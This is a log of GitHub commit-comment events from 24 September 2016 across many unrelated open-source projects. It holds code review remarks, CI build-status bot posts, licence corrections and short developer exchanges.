{"id":"4613002377","type":"CommitCommentEvent","actor":{"login":"solnic"},"repo":{"name":"rom-rb/rom-sql"},"payload":{"comment":{"id":19159700,"position":null,"line":null,"path":null,"commit_id":"5ea5946f3a59f363bc51c125cebf48e09ce970f4","created_at":"2016-09-24T18:54:25Z","updated_at":"2016-09-24T18:54:25Z","body":"Thanks. In general this type of general fixes could always go to master\ndirectly as topic branches can be rebased easily and benefit from the fixes.\n\nOn 24 September 2016 at 10:44:48, Nikita Shilnikov (notifications@github.com)\nwrote:\n\n> @solnic <https://github.com/solnic> ok, done\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/rom-rb/rom-sql/commit/5ea5946f3a59f363bc51c125cebf48e09ce970f4#commitcomment-19158355>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAEKtdSCX0Yj5j_nEVxTlYPPCSVXHouks5qtTdggaJpZM4KFoqD>\n> .\n>\n"}},"created_at":"2016-09-24T18:54:25Z"}
{"id":"4613006119","type":"CommitCommentEvent","actor":{"login":"Dostron"},"repo":{"name":"StoneOffStones/plugin.video.xstream"},"payload":{"comment":{"id":19159714,"position":null,"line":null,"path":null,"commit_id":"03e0434908c28a85e435f5640def84ddd0d59ae8","created_at":"2016-09-24T18:57:09Z","updated_at":"2016-09-24T18:57:09Z","body":"Kleine Anmerkung zu HDFilme und Cloudflare Änderung. \r\nBug bei lokaler Suche: Params (Cookie) mitgeben. Jetzt gibts den 503 Error bei Suche.\r\nFile hdfilme_tv.py Zeile 57:\r\noGui.addFolder(cGuiElement('Suche', SITE_IDENTIFIER, 'showSearch'), params)\r\nDie globale Suche wird natürlich so im Addon nie funktionieren. Dann müsste man das Ganze an das Requesthandler Addon auslagern. Wo es eigentlich auch hingehört.\r\n\r\nSonst funzt hdfilme nach kurzem Test. (ausgenommen Pics)\r\nTks..."}},"created_at":"2016-09-24T18:57:09Z"}
{"id":"4613006262","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19159716,"position":null,"line":null,"path":null,"commit_id":"fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000","created_at":"2016-09-24T18:57:15Z","updated_at":"2016-09-24T18:57:15Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-24T18:57:15Z"}
{"id":"4613006579","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":19159719,"position":22,"line":559,"path":"EMF/events/cm_murder_plot_events.txt","commit_id":"5f3ec3233f786ac4bd81c930292beecd0f3767bd","created_at":"2016-09-24T18:57:29Z","updated_at":"2016-09-24T18:57:29Z","body":"This doesn't really make sense to me. I'm guessing it didn't to @Rylock either, and I may have overwrote his attempt to make sense of it, FYI."}},"created_at":"2016-09-24T18:57:29Z"}
{"id":"4613007416","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19159724,"position":null,"line":null,"path":null,"commit_id":"fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000","created_at":"2016-09-24T18:58:09Z","updated_at":"2016-09-24T18:58:09Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-24T18:58:09Z"}
{"id":"4613007801","type":"CommitCommentEvent","actor":{"login":"toori67"},"repo":{"name":"jongkwang/IoTLabs"},"payload":{"comment":{"id":19159727,"position":14,"line":14,"path":"Documents/90_Communication/English Translate/README_ENG.md","commit_id":"17b5c35458aeac51fff291997ddada82efb89b6d","created_at":"2016-09-24T18:58:27Z","updated_at":"2016-09-24T18:58:27Z","body":"Need to add link to scope. not `-` , `Scope` :) "}},"created_at":"2016-09-24T18:58:27Z"}
{"id":"4613008436","type":"CommitCommentEvent","actor":{"login":"ethantkoenig"},"repo":{"name":"unfoldingWord-dev/tx-manager-lambda"},"payload":{"comment":{"id":19159730,"position":17,"line":15,"path":"functions/listEndpoints/main.py","commit_id":"327e8db38293e085fd4679f9f862f256065552da","created_at":"2016-09-24T18:58:53Z","updated_at":"2016-09-24T18:58:53Z","body":"@richmahn Should this be `TxManager(**env_vars)`?"}},"created_at":"2016-09-24T18:58:53Z"}
{"id":"4613008627","type":"CommitCommentEvent","actor":{"login":"SaltedCashew"},"repo":{"name":"go-web-framework/mux"},"payload":{"comment":{"id":19159731,"position":null,"line":null,"path":null,"commit_id":"cbc9ddedc402d9ad2029a1faa40fc2e20ebc329c","created_at":"2016-09-24T18:59:00Z","updated_at":"2016-09-24T18:59:00Z","body":"I've created a new repo: https://github.com/go-web-framework/gflux\r\nMaybe this is how the package org will go? Not sure, but my assumption was that everything would go under the main package (currently \"gflux\"). If not, we can go another way.\r\nAs far as Context, are you referring to https://godoc.org/golang.org/x/net/context? Or is this another package we're handling ourselves?\r\nI included \"golang.org/x/net/context\" to the imports of samplemux.go, and the errors I got afterwards were simply because mux.go and samplemux.go define/redefine the same things. \r\nCurrently, I have samplemux.go commented out in the gflux repo. \r\n The new gflux repo has a test file we can use, as well.\r\nI'm on now, so feel free to hit me up on slack/hangouts"}},"created_at":"2016-09-24T18:59:00Z"}
{"id":"4613010088","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19159737,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-24T19:00:06Z","updated_at":"2016-09-24T19:00:06Z","body":":o why are we getting separate errors"}},"created_at":"2016-09-24T19:00:06Z"}
{"id":"4613010320","type":"CommitCommentEvent","actor":{"login":"toori67"},"repo":{"name":"jongkwang/IoTLabs"},"payload":{"comment":{"id":19159738,"position":null,"line":null,"path":null,"commit_id":"17b5c35458aeac51fff291997ddada82efb89b6d","created_at":"2016-09-24T19:00:13Z","updated_at":"2016-09-24T19:00:13Z","body":"👍 "}},"created_at":"2016-09-24T19:00:13Z"}
{"id":"4613010620","type":"CommitCommentEvent","actor":{"login":"kulichkov-roman"},"repo":{"name":"kulichkov-roman/smb"},"payload":{"comment":{"id":19159740,"position":null,"line":null,"path":null,"commit_id":"274ee2e5365c303a5fe8ae0f28f3d8af55d89c0a","created_at":"2016-09-24T19:00:24Z","updated_at":"2016-09-24T19:00:24Z","body":"YT убирай из репозитория, не надо его сюда грузить, вставь в ignore"}},"created_at":"2016-09-24T19:00:24Z"}
{"id":"4613010894","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ishantvivek/android_device_samsung_kyleprods"},"payload":{"comment":{"id":19159741,"position":null,"line":null,"path":null,"commit_id":"11531d664dd7632eb07f56ec61a242c10d3fa11c","created_at":"2016-09-24T19:00:33Z","updated_at":"2016-09-24T19:00:33Z","body":"If you translation, do manually and create a pull request of it. I will merge it. That's all i can do at most."}},"created_at":"2016-09-24T19:00:33Z"}
{"id":"4613011636","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19159743,"position":null,"line":null,"path":null,"commit_id":"76be613d09c01823b4aa4f2ab38ff65982feb595","created_at":"2016-09-24T19:01:02Z","updated_at":"2016-09-24T19:01:02Z","body":"But will they follow our ships if we leave the system?"}},"created_at":"2016-09-24T19:01:02Z"}
{"id":"4613012038","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19159744,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-24T19:01:21Z","updated_at":"2016-09-24T19:01:21Z","body":"Because your machine is too permissive\n\nAm 24.09.2016 9:00 nachm. schrieb \"Neil Agarwal\" <notifications@github.com>:\n\n> :o why are we getting separate errors\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/halogenOS/android_build/commit/fcc4b2fc143062f8051ba81133d68ac41d69deab#commitcomment-19159737>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGowjUHbyf4EtnneD4O7K6BSaGO12SEbks5qtXM2gaJpZM4KFK5G>\n> .\n>\n"}},"created_at":"2016-09-24T19:01:21Z"}
{"id":"4613013371","type":"CommitCommentEvent","actor":{"login":"spike11302000"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19159747,"position":null,"line":null,"path":null,"commit_id":"0d5ee02b44f95f92614255b1bf429ca477d6d849","created_at":"2016-09-24T19:02:16Z","updated_at":"2016-09-24T19:02:16Z","body":"hey"}},"created_at":"2016-09-24T19:02:16Z"}
{"id":"4613013820","type":"CommitCommentEvent","actor":{"login":"luk1337"},"repo":{"name":"grv1337/grv1337.github.io"},"payload":{"comment":{"id":19159748,"position":null,"line":null,"path":null,"commit_id":"77188a81068e338a9538dd047713c90ca4c21a13","created_at":"2016-09-24T19:02:35Z","updated_at":"2016-09-24T19:02:35Z","body":"To nie jest strona jakiegos gimnazjum kurwa. Wez to wyjeb."}},"created_at":"2016-09-24T19:02:35Z"}
{"id":"4613014738","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19159751,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-24T19:03:17Z","updated_at":"2016-09-24T19:03:17Z","body":"Or your machine is too enforcing"}},"created_at":"2016-09-24T19:03:17Z"}
{"id":"4613015993","type":"CommitCommentEvent","actor":{"login":"antfriend"},"repo":{"name":"antfriend/antfriend.github.io"},"payload":{"comment":{"id":19159757,"position":null,"line":null,"path":null,"commit_id":"c080924cc1a304041d4d3b1f06a29d151eea3088","created_at":"2016-09-24T19:04:17Z","updated_at":"2016-09-24T19:04:17Z","body":"you clicked on \"this\"!"}},"created_at":"2016-09-24T19:04:17Z"}
{"id":"4613016081","type":"CommitCommentEvent","actor":{"login":"faster13"},"repo":{"name":"faster13/HPSMRequestAssignment"},"payload":{"comment":{"id":19159758,"position":null,"line":null,"path":null,"commit_id":"389e5b4207d42a9c135d5bfab53badd08f7e8c30","created_at":"2016-09-24T19:04:21Z","updated_at":"2016-09-24T19:04:21Z","body":"Read.me created"}},"created_at":"2016-09-24T19:04:21Z"}
{"id":"4613017697","type":"CommitCommentEvent","actor":{"login":"Cubansephiroth"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19159761,"position":null,"line":null,"path":null,"commit_id":"9b2a611994755a31169f90c2a497120ff326a6dc","created_at":"2016-09-24T19:05:32Z","updated_at":"2016-09-24T19:05:32Z","body":"I dream to see the day where Pandaren starting zone will be scripted. I managed to leave pandaren zone with a gm account and almost every quest works, the problem is with phases. this is the only thing that stop me to run a small server in my country with this awesome core, actually i am running a wotlk with about 1k players online (childrens and young people) across all the country and i know a Pandaria server will set a smile in a lot of childrens faces, lot of them ask me for a server where they can play as a cute Pandaren but currently no good source available(i need to compiled it in Linux)  and i am following close this project. Hope this proyect keeps growing and more cool things comming. Sorry for long talk and keep the good work."}},"created_at":"2016-09-24T19:05:32Z"}
{"id":"4613019344","type":"CommitCommentEvent","actor":{"login":"antfriend"},"repo":{"name":"antfriend/antfriend.github.io"},"payload":{"comment":{"id":19159765,"position":null,"line":null,"path":null,"commit_id":"c080924cc1a304041d4d3b1f06a29d151eea3088","created_at":"2016-09-24T19:06:44Z","updated_at":"2016-09-24T19:06:44Z","body":"I knew you could."}},"created_at":"2016-09-24T19:06:44Z"}
{"id":"4613020414","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19159767,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-24T19:07:31Z","updated_at":"2016-09-24T19:07:31Z","body":"Yes it is. Asks for sudo password frequently.\n\nAm 24.09.2016 9:03 nachm. schrieb \"Neil Agarwal\" <notifications@github.com>:\n\n> Or your machine is too enforcing\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/halogenOS/android_build/commit/fcc4b2fc143062f8051ba81133d68ac41d69deab#commitcomment-19159751>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGowjQP6eyOyOXsbRDR0xuMOrVkSY25kks5qtXP2gaJpZM4KFK5G>\n> .\n>\n"}},"created_at":"2016-09-24T19:07:31Z"}
{"id":"4613021894","type":"CommitCommentEvent","actor":{"login":"prakashn27"},"repo":{"name":"AlgorithmCrackers/Interview-Questions"},"payload":{"comment":{"id":19159772,"position":3,"line":3,"path":"00_Arrays/ContainsDuplicate/C++/Makefile","commit_id":"7c561b5ffdc64659492ee40d14b707ca0470581e","created_at":"2016-09-24T19:08:33Z","updated_at":"2016-09-24T19:08:33Z","body":"Interesting. I was always under the assumption that we have to write targets to execute c or c++ code. \r\n\r\n"}},"created_at":"2016-09-24T19:08:33Z"}
{"id":"4613022609","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19159774,"position":null,"line":null,"path":null,"commit_id":"76be613d09c01823b4aa4f2ab38ff65982feb595","created_at":"2016-09-24T19:09:04Z","updated_at":"2016-09-24T19:09:04Z","body":"they probably do, and they should"}},"created_at":"2016-09-24T19:09:04Z"}
{"id":"4613024999","type":"CommitCommentEvent","actor":{"login":"faster13"},"repo":{"name":"faster13/HPSMRequestAssignment"},"payload":{"comment":{"id":19159779,"position":null,"line":null,"path":null,"commit_id":"9d692e5bb845d927009b80f8d475b08116a19eb3","created_at":"2016-09-24T19:10:49Z","updated_at":"2016-09-24T19:10:49Z","body":"Readme update/"}},"created_at":"2016-09-24T19:10:49Z"}
{"id":"4613027532","type":"CommitCommentEvent","actor":{"login":"cinquin"},"repo":{"name":"cinquin/MultiTouch-Gestures-Java"},"payload":{"comment":{"id":19159790,"position":null,"line":null,"path":null,"commit_id":"be810d7547ea0ba327a7ddac2ae3e470e1125671","created_at":"2016-09-24T19:12:37Z","updated_at":"2016-09-24T19:12:37Z","body":"@mcourteaux Have you had a chance to think about what license you could specify for MultiTouch-Gestures-Java?"}},"created_at":"2016-09-24T19:12:37Z"}
{"id":"4613027543","type":"CommitCommentEvent","actor":{"login":"Konard"},"repo":{"name":"Konard/LinksPlatform"},"payload":{"comment":{"id":19159791,"position":13,"line":17,"path":"Platform/Platform.Tests/Helpers/SerializationHelpersTests.cs","commit_id":"12d0a7c6366c6a3b2d3c5f6d88740ba63e02a26d","created_at":"2016-09-24T19:12:38Z","updated_at":"2016-09-24T19:12:38Z","body":"No need to add `System.` to `System.Environment.NewLine` if `using System;` is added."}},"created_at":"2016-09-24T19:12:38Z"}
{"id":"4613028310","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19159797,"position":null,"line":null,"path":null,"commit_id":"fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000","created_at":"2016-09-24T19:13:16Z","updated_at":"2016-09-24T19:13:16Z","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-12: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-24T19:13:16Z"}
{"id":"4613029001","type":"CommitCommentEvent","actor":{"login":"waldyrious"},"repo":{"name":"libass/libass"},"payload":{"comment":{"id":19159800,"position":null,"line":null,"path":null,"commit_id":"9422a80578bc44f662f07edf723f85239a0579f5","created_at":"2016-09-24T19:13:48Z","updated_at":"2016-09-24T19:13:48Z","body":"@grigorig please note that this license is not the MIT license, but the related ISC license instead. Compare the text of both licenses: http://choosealicense.com/licenses/mit/ vs. http://choosealicense.com/licenses/isc/"}},"created_at":"2016-09-24T19:13:48Z"}
{"id":"4613031738","type":"CommitCommentEvent","actor":{"login":"hallaathrad"},"repo":{"name":"marhyorh/FreeCodeCamp"},"payload":{"comment":{"id":19159810,"position":null,"line":null,"path":null,"commit_id":"3477ed048850ade3ae155e0b7d94ef978d3bd0b5","created_at":"2016-09-24T19:15:47Z","updated_at":"2016-09-24T19:15:47Z","body":"Please change the commit name to not have the issue number in it.\r\nAnd then what you do is at the PR creating, the template offers a space to say \"closes #10900\".\r\n\r\nI'm testing the code on my machine meanwhile"}},"created_at":"2016-09-24T19:15:47Z"}
{"id":"4613036559","type":"CommitCommentEvent","actor":{"login":"httpdigest"},"repo":{"name":"code-disaster/lwjgl3"},"payload":{"comment":{"id":19159833,"position":255,"line":255,"path":"modules/core/src/test/java/org/lwjgl/demo/bgfx/BGFXDemoUtil.java","commit_id":"d47745342da3b528ca96076479ef1e89d8f2042b","created_at":"2016-09-24T19:19:21Z","updated_at":"2016-09-24T19:19:21Z","body":"This should read:\r\n  `dest.setPerspectiveLH(fovRadians, aspect, near, far, !oglNdc);`\r\nThe boolean parameter `zZeroToOne` of `setPerspectiveLH` indicates whether z is within \\[0..1\\], so must be `false` for OpenGL compatibility / homogeneous depth, which is also the default when omitting that parameter."}},"created_at":"2016-09-24T19:19:21Z"}
{"id":"4613037247","type":"CommitCommentEvent","actor":{"login":"grigorig"},"repo":{"name":"libass/libass"},"payload":{"comment":{"id":19159835,"position":null,"line":null,"path":null,"commit_id":"9422a80578bc44f662f07edf723f85239a0579f5","created_at":"2016-09-24T19:19:56Z","updated_at":"2016-09-24T19:19:56Z","body":"Ah, I'm so sorry. Of course it is (and I know that). I'll fix it, but I doubt it's a critical issue that requires a new release."}},"created_at":"2016-09-24T19:19:56Z"}
{"id":"4613038710","type":"CommitCommentEvent","actor":{"login":"CarlosNihelton"},"repo":{"name":"CarlosNihelton/kdev-clang-tidy"},"payload":{"comment":{"id":19159843,"position":null,"line":null,"path":null,"commit_id":"4e48129e8c4d7897d32600c36520d27f08a4f73b","created_at":"2016-09-24T19:21:00Z","updated_at":"2016-09-24T19:21:00Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refactor code](https://trello.com/c/PnsgTE70/1-refactor-code)"}},"created_at":"2016-09-24T19:21:00Z"}
{"id":"4613039248","type":"CommitCommentEvent","actor":{"login":"httpdigest"},"repo":{"name":"code-disaster/lwjgl3"},"payload":{"comment":{"id":19159845,"position":166,"line":166,"path":"modules/core/src/test/java/org/lwjgl/demo/bgfx/Raymarch.java","commit_id":"d47745342da3b528ca96076479ef1e89d8f2042b","created_at":"2016-09-24T19:21:24Z","updated_at":"2016-09-24T19:21:24Z","body":"1.8.4 is out now, so you can use `Matrix4f.setOrthoLH()`. Remember to also use `zZeroToOne = !oglNdc`."}},"created_at":"2016-09-24T19:21:24Z"}
{"id":"4613040727","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19159851,"position":null,"line":null,"path":null,"commit_id":"fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000","created_at":"2016-09-24T19:22:31Z","updated_at":"2016-09-24T19:22:31Z","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-12: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-24T19:22:31Z"}
{"id":"4613041195","type":"CommitCommentEvent","actor":{"login":"marhyorh"},"repo":{"name":"marhyorh/FreeCodeCamp"},"payload":{"comment":{"id":19159855,"position":null,"line":null,"path":null,"commit_id":"3477ed048850ade3ae155e0b7d94ef978d3bd0b5","created_at":"2016-09-24T19:22:54Z","updated_at":"2016-09-24T19:22:54Z","body":"Okay (y)"}},"created_at":"2016-09-24T19:22:54Z"}
{"id":"4613041586","type":"CommitCommentEvent","actor":{"login":"endless-sky"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19159857,"position":null,"line":null,"path":null,"commit_id":"76be613d09c01823b4aa4f2ab38ff65982feb595","created_at":"2016-09-24T19:23:10Z","updated_at":"2016-09-24T19:23:10Z","body":"Unless they have a \"staying\" personality (like a bounty ship)."}},"created_at":"2016-09-24T19:23:10Z"}
{"id":"4613042460","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19159860,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-24T19:23:51Z","updated_at":"2016-09-24T19:23:51Z","body":"k"}},"created_at":"2016-09-24T19:23:51Z"}
{"id":"4613042547","type":"CommitCommentEvent","actor":{"login":"sr320"},"repo":{"name":"sr320/paper-pano-go"},"payload":{"comment":{"id":19159862,"position":null,"line":null,"path":null,"commit_id":"e85f3bcb219c629c012cb05a479d20cbce5b22ec","created_at":"2016-09-24T19:23:55Z","updated_at":"2016-09-24T19:23:55Z","body":"Sorry if I missed it, but where is the table you made? The only commit I see is the notebook.\r\nthanks"}},"created_at":"2016-09-24T19:23:55Z"}
{"id":"4613043619","type":"CommitCommentEvent","actor":{"login":"capflam"},"repo":{"name":"klacke/yaws"},"payload":{"comment":{"id":19159866,"position":null,"line":null,"path":null,"commit_id":"3364e06d56e9bc9261ec3b2e63b4323af4aaeac9","created_at":"2016-09-24T19:24:46Z","updated_at":"2016-09-24T19:24:46Z","body":"You're right, it does not work anymore. But, in you example, you can use bindings. I removed support of `<erl>` block in HTML tags because bindings can be used instead.\r\nSo you can rewrite your example as following:\r\n```html\r\n      <erl>\r\n          out(A) ->\r\n              {bindings, [{\"current_page\", atom_to_list(d_lan_common:current_page(A))}]}.\r\n      </erl>\r\n      <div id=\"content-bg\">\r\n         <div id=\"content\" class=\"%%current_page%%\">\r\n            <erl>\r\n               out(A) ->\r\n                  {yssi, yaws_api:binding(\"current_page\") ++ \".yaws\"}.\r\n            </erl>\r\n         </div>\r\n      </div>\r\n```"}},"created_at":"2016-09-24T19:24:46Z"}
{"id":"4613044057","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kyleprods"},"payload":{"comment":{"id":19159867,"position":null,"line":null,"path":null,"commit_id":"11531d664dd7632eb07f56ec61a242c10d3fa11c","created_at":"2016-09-24T19:25:09Z","updated_at":"2016-09-24T19:25:09Z","body":"OK"}},"created_at":"2016-09-24T19:25:09Z"}
{"id":"4613045173","type":"CommitCommentEvent","actor":{"login":"cjoa"},"repo":{"name":"cjtoribio/algopit"},"payload":{"comment":{"id":19159869,"position":14,"line":18,"path":"public/shared/templates/pagination.html","commit_id":"7a1d633a4f3de137da287853d265a1d37c3e0f40","created_at":"2016-09-24T19:25:56Z","updated_at":"2016-09-24T19:25:56Z","body":"Rename \"Problems\" => \"Results\" since pagination is also used for Categories manager"}},"created_at":"2016-09-24T19:25:56Z"}
{"id":"4613045731","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":19159871,"position":null,"line":null,"path":null,"commit_id":"650c3a59134748c51ed5aa0deca78915df5c0668","created_at":"2016-09-24T19:26:21Z","updated_at":"2016-09-24T19:26:21Z","body":"Also related to #249 "}},"created_at":"2016-09-24T19:26:21Z"}
{"id":"4613047781","type":"CommitCommentEvent","actor":{"login":"waldyrious"},"repo":{"name":"libass/libass"},"payload":{"comment":{"id":19159877,"position":null,"line":null,"path":null,"commit_id":"9422a80578bc44f662f07edf723f85239a0579f5","created_at":"2016-09-24T19:27:54Z","updated_at":"2016-09-24T19:27:54Z","body":"Oh sure, not a critical issue :) just pointing it out so it didn't go unnoticed."}},"created_at":"2016-09-24T19:27:54Z"}
{"id":"4613049470","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kyleprods"},"payload":{"comment":{"id":19159891,"position":null,"line":null,"path":null,"commit_id":"11531d664dd7632eb07f56ec61a242c10d3fa11c","created_at":"2016-09-24T19:29:16Z","updated_at":"2016-09-24T19:29:16Z","body":"Offtopic:\r\nI have problems writing to the external SD card with some apps (like Pocket Git) on CM 13 (this behavior doesn't happen on CM 12.1) "}},"created_at":"2016-09-24T19:29:16Z"}
{"id":"4613053749","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19159914,"position":null,"line":null,"path":null,"commit_id":"c692fc87ccb6b80d94517a65cd986484599a41ef","created_at":"2016-09-24T19:32:23Z","updated_at":"2016-09-24T19:32:23Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [In-Game Collision-box Editor](https://trello.com/c/HQBF1SBM/86-in-game-collision-box-editor)"}},"created_at":"2016-09-24T19:32:23Z"}
{"id":"4613053851","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19159916,"position":null,"line":null,"path":null,"commit_id":"3f195b028e7b05c6fe868a2cfee090565de50ebd","created_at":"2016-09-24T19:32:28Z","updated_at":"2016-09-24T19:32:28Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [In-Game Collision-box Editor](https://trello.com/c/HQBF1SBM/86-in-game-collision-box-editor)"}},"created_at":"2016-09-24T19:32:28Z"}
{"id":"4613056767","type":"CommitCommentEvent","actor":{"login":"skisms"},"repo":{"name":"skisms/test"},"payload":{"comment":{"id":19159930,"position":null,"line":null,"path":null,"commit_id":"946c100a772c45466af6da4de668e66f1ed1681d","created_at":"2016-09-24T19:34:39Z","updated_at":"2016-09-24T19:34:39Z","body":"i meant, tacos removal"}},"created_at":"2016-09-24T19:34:39Z"}
{"id":"4613057413","type":"CommitCommentEvent","actor":{"login":"kyrias"},"repo":{"name":"cjdelisle/cjdns"},"payload":{"comment":{"id":19159934,"position":29,"line":29,"path":"contrib/c/mkpasswd.c","commit_id":"1735b22c751b774b50c0150d793e3b6920f2a6ad","created_at":"2016-09-24T19:35:11Z","updated_at":"2016-09-24T19:35:11Z","body":"This should have a newline printed."}},"created_at":"2016-09-24T19:35:11Z"}
{"id":"4613058644","type":"CommitCommentEvent","actor":{"login":"m4cx"},"repo":{"name":"me-software/ArgeHeiwako.NET"},"payload":{"comment":{"id":19159940,"position":null,"line":null,"path":null,"commit_id":"9f3073f9aa28d4db4393d9227c39e44a3826c28a","created_at":"2016-09-24T19:36:05Z","updated_at":"2016-09-24T19:36:05Z","body":"#30 "}},"created_at":"2016-09-24T19:36:05Z"}
{"id":"4613060653","type":"CommitCommentEvent","actor":{"login":"kamarush"},"repo":{"name":"kamarush/android_device_lge_hammerhead"},"payload":{"comment":{"id":19159947,"position":6,"line":209,"path":"camera/QCamera2/HAL3/QCamera3PostProc.cpp","commit_id":"2eaabef9c059487f4051600d1837b461941e42d3","created_at":"2016-09-24T19:37:33Z","updated_at":"2016-09-24T19:37:33Z","body":"QCamera3: Start data proc synchronization issue\r\n\r\nThere is no synchronization between sending\r\nstart data proc command and queuing the snapshot\r\nbuffer given by application for reprocess. This\r\nsometimes leads to snapshot getting stuck since\r\nthe postproc input queue is not initalized by the\r\ntime we are trying to queue the snapshot buffer\r\nfor reprocess.\r\n\r\nFix: Changed sending start data proc to a\r\nsynchronous command to ensure buffer is queued only\r\nafter the dataproc queues have been initialized."}},"created_at":"2016-09-24T19:37:33Z"}
